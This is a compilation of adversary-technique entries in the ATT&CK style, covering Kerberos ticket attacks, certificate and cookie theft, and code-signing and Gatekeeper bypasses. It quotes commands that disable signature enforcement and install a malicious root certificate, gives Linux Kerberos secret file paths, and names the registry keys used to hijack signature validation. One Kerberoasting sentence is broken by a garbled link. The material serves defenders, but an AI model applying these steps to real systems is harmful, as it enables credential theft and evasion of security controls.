Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)<sup>[[APT29 Deep Look at Credential Roaming](https://app.tidalcyber.com/references/691fb596-07b6-5c13-9cec-e28530ffde12)]</sup>, misplaced certificate files (i.e. [Unsecured Credentials](https://app.tidalcyber.com/technique/02ed857b-ba39-4fab-b1d9-3ed2aa689dfd)), or directly from the Windows certificate store via various crypto APIs.<sup>[[SpecterOps Certified Pre Owned](https://app.tidalcyber.com/references/73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698)]</sup><sup>[[GitHub CertStealer](https://app.tidalcyber.com/references/da06ce8f-f950-4ae8-a62a-b59b236e91a3)]</sup><sup>[[GitHub GhostPack Certificates](https://app.tidalcyber.com/references/941e214d-4188-4ca0-9ef8-b26aa96373a2)]</sup> With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>

Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) via stealing or forging certificates that can be used as [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) for the duration of the certificate’s validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup> Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) ticket-granting tickets (TGT) or NTLM plaintext.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>

The tag is: misp-galaxy:technique="Steal or Forge Authentication Certificates"

AS-REP Roasting

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) Kerberos messages.<sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup>

Preauthentication offers protection against offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.<sup>[[Microsoft Kerberos Preauth 2014](https://app.tidalcyber.com/references/328953ed-93c7-46c0-9a05-53dc44d294fe)]</sup>

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) attacks similarly to [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be) and expose plaintext credentials. <sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup><sup>[[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]</sup>

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. <sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup><sup>[[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]</sup>

The tag is: misp-galaxy:technique="AS-REP Roasting"

Golden Ticket

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.<sup>[[AdSecurity Kerberos GT Aug 2015](https://app.tidalcyber.com/references/aac51d49-9a72-4456-8539-8a5f5d0ef7d7)]</sup> Golden tickets enable adversaries to generate authentication material for any account in Active Directory.<sup>[[CERT-EU Golden Ticket Protection](https://app.tidalcyber.com/references/268f9cfa-71f4-4cb1-96f3-c61e71892d30)]</sup>

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.<sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup>

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.<sup>[[ADSecurity Kerberos and KRBTGT](https://app.tidalcyber.com/references/6e61f3e1-35e6-44f4-9bc4-60b2bcb71b15)]</sup> The KRBTGT password hash may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) and privileged access to a domain controller.

The tag is: misp-galaxy:technique="Golden Ticket"

Kerberoasting

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force]([Empire InvokeKerberoast Oct 2016(https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup><sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup>

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service<sup>[[Microsoft Detecting Kerberoasting Feb 2018](https://app.tidalcyber.com/references/b36d82a8-82ca-4f22-85c0-ee82be3b6940)]</sup>).<sup>[[Microsoft SPN](https://app.tidalcyber.com/references/985ad31b-c385-473d-978d-40b6cd85268a)]</sup><sup>[[Microsoft SetSPN](https://app.tidalcyber.com/references/dd5dc432-32de-4bf3-b2c7-0bbdda031dd0)]</sup><sup>[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]</sup><sup>[[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]</sup>

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).<sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup><sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup> Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) attacks that may expose plaintext credentials.<sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup><sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup> <sup>[[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]</sup>

This same behavior could be executed using service tickets captured from network traffic.<sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup>

The tag is: misp-galaxy:technique="Kerberoasting"

Silver Ticket

Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.<sup>[[ADSecurity Silver Tickets](https://app.tidalcyber.com/references/5185560e-b8f0-4c40-8c90-cb12348a0f7f)]</sup>

Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.<sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup>

Password hashes for target services may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).

The tag is: misp-galaxy:technique="Silver Ticket"

Steal or Forge Kerberos Tickets

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).<sup>[[ADSecurity Kerberos Ring Decoder](https://app.tidalcyber.com/references/5f78a554-2d5c-49af-8c6c-6e10f9aec997)]</sup> Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.<sup>[[Microsoft Klist](https://app.tidalcyber.com/references/f500340f-23fc-406a-97ef-0de787ef8cec)]</sup>

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user’s session lasts.<sup>[[MIT ccache](https://app.tidalcyber.com/references/6a1b4373-2304-420c-8733-e1eae71ff7b2)]</sup> On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). The ccache file may also be converted into a Windows format using tools such as Kekeo.<sup>[[Linux Kerberos Tickets](https://app.tidalcyber.com/references/5aea042f-4eb1-4092-89be-3db695053470)]</sup><sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup><sup>[[Kekeo](https://app.tidalcyber.com/references/0b69f0f5-dd4a-4926-9369-8253a0c3ddea)]</sup>

Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller’s environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple’s native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user’s TGT or Service Tickets.<sup>[[SpectorOps Bifrost Kerberos macOS 2019](https://app.tidalcyber.com/references/58ecb4e9-25fc-487b-9fed-25c781cc531b)]</sup><sup>[[macOS kerberos framework MIT](https://app.tidalcyber.com/references/8e09346b-03ce-4627-a365-f2f63089d1e0)]</sup>

The tag is: misp-galaxy:technique="Steal or Forge Kerberos Tickets"

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>

There are several examples of malware targeting cookies from web browsers on the local system.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup> There are also open source frameworks such as Evilginx2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)) that can be set up by an adversary and used in phishing campaigns.<sup>[[Github evilginx2](https://app.tidalcyber.com/references/322e5d90-5095-47ea-b0e2-e7e5fb45fcca)]</sup><sup>[[GitHub Mauraena](https://app.tidalcyber.com/references/578ecf62-b546-4f52-9d50-92557edf2dd4)]</sup>

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1) technique to login to the corresponding web application.

The tag is: misp-galaxy:technique="Steal Web Session Cookie"

Code Signing

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. <sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> The certificates used during an operation may be created, acquired, or stolen by the adversary. <sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup> <sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup> Unlike [Invalid Code Signature](https://app.tidalcyber.com/technique/aa5a31d0-1b78-481d-a317-5089c1e111bf), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. <sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup><sup>[[EclecticLightChecksonEXECodeSigning](https://app.tidalcyber.com/references/2885db46-4f8c-4c35-901c-7641c7701293)]</sup>

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:technique="Code Signing"

Code Signing Policy Modification

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.<sup>[[Microsoft DSE June 2017](https://app.tidalcyber.com/references/451bdfe3-0b30-425c-97a0-44727b70c1da)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup> Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.<sup>[[Microsoft Unsigned Driver Apr 2017](https://app.tidalcyber.com/references/5964ff2e-0860-4e00-8103-89ba6466314c)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup>

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.<sup>[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup><sup>[[FireEye HIKIT Rootkit Part 2](https://app.tidalcyber.com/references/48448972-a5ed-4371-b930-b51dcb174b82)]</sup><sup>[[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]</sup> Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.<sup>[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup> Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.<sup>[[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]</sup>

To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) using a signed, but vulnerable driver.<sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup><sup>[[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]</sup>

The tag is: misp-galaxy:technique="Code Signing Policy Modification"

Gatekeeper Bypass

Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.<sup>[[TheEclecticLightCompany Quarantine and the flag](https://app.tidalcyber.com/references/7cce88cc-fbfb-43e1-a330-ac55bce9e394)]</sup><sup>[[TheEclecticLightCompany apple notarization ](https://app.tidalcyber.com/references/80c840ab-782a-4f15-bc7b-2d2ab4e51702)]</sup>

Based on an opt-in system, when files are downloaded an extended attribute (xattr) called com.apple.quarantine (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:

  1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.<sup>[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

  2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.

  3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.

  4. Notarization - Using the api.apple-cloudkit.com API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.

Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.<sup>[[theevilbit gatekeeper bypass 2021](https://app.tidalcyber.com/references/d00f373d-2133-47c3-9b0a-104ecc9a6869)]</sup><sup>[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]</sup>

Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).

The tag is: misp-galaxy:technique="Gatekeeper Bypass"

Install Root Certificate

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate.<sup>[[Wikipedia Root Certificate](https://app.tidalcyber.com/references/68b9ccbb-906e-4f06-b5bd-3969723c3616)]</sup> Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.<sup>[[Operation Emmental](https://app.tidalcyber.com/references/36443369-4fa9-4802-8b21-68cc382b949f)]</sup>

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) capability for intercepting information transmitted over secure TLS/SSL communications.<sup>[[Kaspersky Superfish](https://app.tidalcyber.com/references/3d554c05-992c-41f3-99f4-6b0baac56b3a)]</sup>

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.<sup>[[SpectorOps Code Signing Dec 2017](https://app.tidalcyber.com/references/3efc5ae9-c63a-4a07-bbbd-d7324acdbaf5)]</sup>

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.<sup>[[objective-see ay mami 2018](https://app.tidalcyber.com/references/1b1d656c-4fe6-47d1-9ce5-a70c33003507)]</sup>

The tag is: misp-galaxy:technique="Install Root Certificate"

Mark-of-the-Web Bypass

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.<sup>[[Microsoft Zone.Identifier 2020](https://app.tidalcyber.com/references/2efbb7be-3ca1-444a-8584-7ceb08101e74)]</sup> Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.<sup>[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)]</sup><sup>[[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]</sup><sup>[[Intezer Russian APT Dec 2020](https://app.tidalcyber.com/references/88d8a3b7-d994-4fd2-9aa1-83b79bccda7e)]</sup>

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.<sup>[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)]</sup><sup>[[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]</sup>

The tag is: misp-galaxy:technique="Mark-of-the-Web Bypass"

SIP and Trust Provider Hijacking

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode <sup>[[Microsoft Authenticode](https://app.tidalcyber.com/references/33efd1a3-ffe9-42b3-ae12-970ed11454bf)]</sup> digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, <sup>[[Microsoft WinVerifyTrust](https://app.tidalcyber.com/references/cc14faff-c164-4135-ae36-ba68e1a50024)]</sup> which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) <sup>[[EduardosBlog SIPs July 2008](https://app.tidalcyber.com/references/ac37f167-3ae9-437b-9215-c30c1ab4e249)]</sup> to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all <sup>[[Microsoft Catalog Files and Signatures April 2017](https://app.tidalcyber.com/references/5b6ae460-a1cf-4afe-a0c8-d6ea24741ebe)]</sup>) and are identified by globally unique identifiers (GUIDs). <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

Similar to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP <sup>[[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)]</sup> (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP <sup>[[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)]</sup> (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

  • Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

